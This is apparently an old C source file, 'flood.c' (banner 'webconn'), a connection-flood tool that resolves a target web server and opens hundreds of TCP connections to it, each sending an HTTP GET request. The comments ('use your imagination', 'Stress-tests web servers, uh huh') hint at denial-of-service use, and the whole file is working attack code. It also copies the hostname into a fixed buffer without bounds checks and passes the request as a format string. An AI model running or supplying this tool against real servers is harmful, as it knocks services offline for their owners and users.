/* flood.c -> use your imagination *
 * Mark KAmichoff [kamicm@rpi.edu] */

#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <netdb.h>
#include <sys/utsname.h>

#define _UTS_NAMESIZE 16
#define _UTS_NODESIZE 256
#define VERSION "0.1pre1"
#define SA struct sockaddr

// int sockfd[255];
int sockfd[511];
int sockfdnum;
struct sockaddr_in saddr;

void signalterminate(void);
void signalinterrupt(void);
void dohttp(int, char *);
void setupsignals(void);	/* sets up signal handlers */

// void dohttp(int, char *, const SA *);

void signalterminate(void) {
	int i;
	fputs("caught SIGTERM...exiting now...\n",stderr);
	for(i=0;i<sockfdnum;++i)
	{
		close(sockfd[i]);
		printf(".");
	}
	fputs("\nclosed client and server file descriptors...\n",stderr);
	exit(1);
}

void signalinterrupt(void) {
	int i;
	fputs("caught SIGINT...exiting now...\n",stderr);
	for(i=0;i<sockfdnum;++i)
	{
		close(sockfd[i]);
		printf(".");
	}
	fputs("closed client and server file descriptors...\n",stderr);
	exit(1);
}

void setupsignals(void) {
        signal(SIGINT,(void *) signalinterrupt);
        signal(SIGTERM,(void *) signalterminate);
}

// void dohttp(int socketnum, char *hostname, const SA * saddr)
void dohttp(int socketnum, char *hostname)
{
	char buff[80];
	char darequest[500];
	char flag=0;	/* 0 is ok to connect, 1 is errconn */

	strcpy(darequest,"GET / HTTP/1.1\nHost: ");
	strcat(darequest,hostname);
	strcat(darequest,"\n\n");

	printf("[%d] Current HTTP Request:\n%s",socketnum,darequest);
	
	if((sockfd[socketnum] = socket(AF_INET, SOCK_STREAM,0)) < 0)
	{
		fputs("Socket error, aborting...\n",stderr);
		exit(1);
	}	

/*	printf("connecting to %s:%d\n",
		inet_ntoa(saddr.sin_addr),
		ntohs(saddr.sin_port));
*/

	if(connect(sockfd[socketnum], (SA *) &saddr, sizeof(saddr)) < 0)
	{
		fputs("Error Connecting - \n------------------------------\n",stdout);
		flag=1;
	}
	else
		fputs("Connect Success - \n------------------------------\n",stdout);

	if(flag != 1)
	{
		snprintf(buff, sizeof(buff), darequest);
		write(sockfd[socketnum], buff, strlen(buff));
	}
}		

int main(int argc, char **argv)
{
	struct hostent *hptr;
	struct utsname *myname;
//	char recvline[80];
	int i;	/* Counter */
	struct in_addr ** pptr;	/* need this because sometimes we get
				   more than one address from a domain lookup */

	setupsignals();	/* sets up signal handlers */

	sockfdnum = 0;	/* we haven't created any yet */

	printf("================================================\n");
	printf(" webconn %s by Mark Kamichoff\n",VERSION);
	printf(" Stress-tests web servers, uh huh...\n");
	printf("================================================\n\n");

	if(argc != 4)
	{
		fputs("Argument count must == 4!\n",stderr);
		fprintf(stderr,"%s <host> <http port> <num connections>\n",argv[0]);
		exit(1);
	}

	bzero(&saddr, sizeof(saddr));

	hptr = gethostbyname(argv[1]);

	if(hptr == NULL)
	{
		printf("DNS resolver returned an error for %s, exiting...\n",
			argv[1]);
		exit(1);
	}

	/* we have to cast as a double ptr to struct in_addr
	   because gcc yells if you don't!  whoknows! */
	pptr = (struct in_addr **) hptr->h_addr_list;
	memcpy(&saddr.sin_addr, *pptr, sizeof(struct in_addr));

	if(hptr->h_aliases[0] != NULL)
	{
		printf("%s resolved to %s\nbut has real name %s and an alias of %s\n",
			argv[1],
			inet_ntoa(saddr.sin_addr),
			hptr->h_name,
			hptr->h_aliases[0]);
	}
	else
	{
		printf("%s resolved to %s\nbut has real name %s\n",
			argv[1],
			inet_ntoa(saddr.sin_addr),
			hptr->h_name);
	}

/*	if(inet_pton(AF_INET, hptr->h_addr_list[0], &saddr.sin_addr) <= 0)
	{
		printf("inet_pton error for %s, prolly a bad address somehow\n",
			argv[1]);
		exit(1);
	}	*/

	saddr.sin_family = AF_INET;
	saddr.sin_port = htons(atoi(argv[2]));

	/* by now the address structure is setup */

	printf("Press ENTER to go!");
	getchar();

	printf("\nNow connecting...\n");
	
/*	printf("connecting to %s:%d\n",
		inet_ntoa(addr.sin_addr),
		ntohs(addr.sin_port));	*/

	for(i=0;i<atoi(argv[3]);++i)
	{
//		dohttp(i,argv[1],(SA *) &addr);
		dohttp(i,argv[1]);
	}

//	printf("\n");

	exit(0);
}	
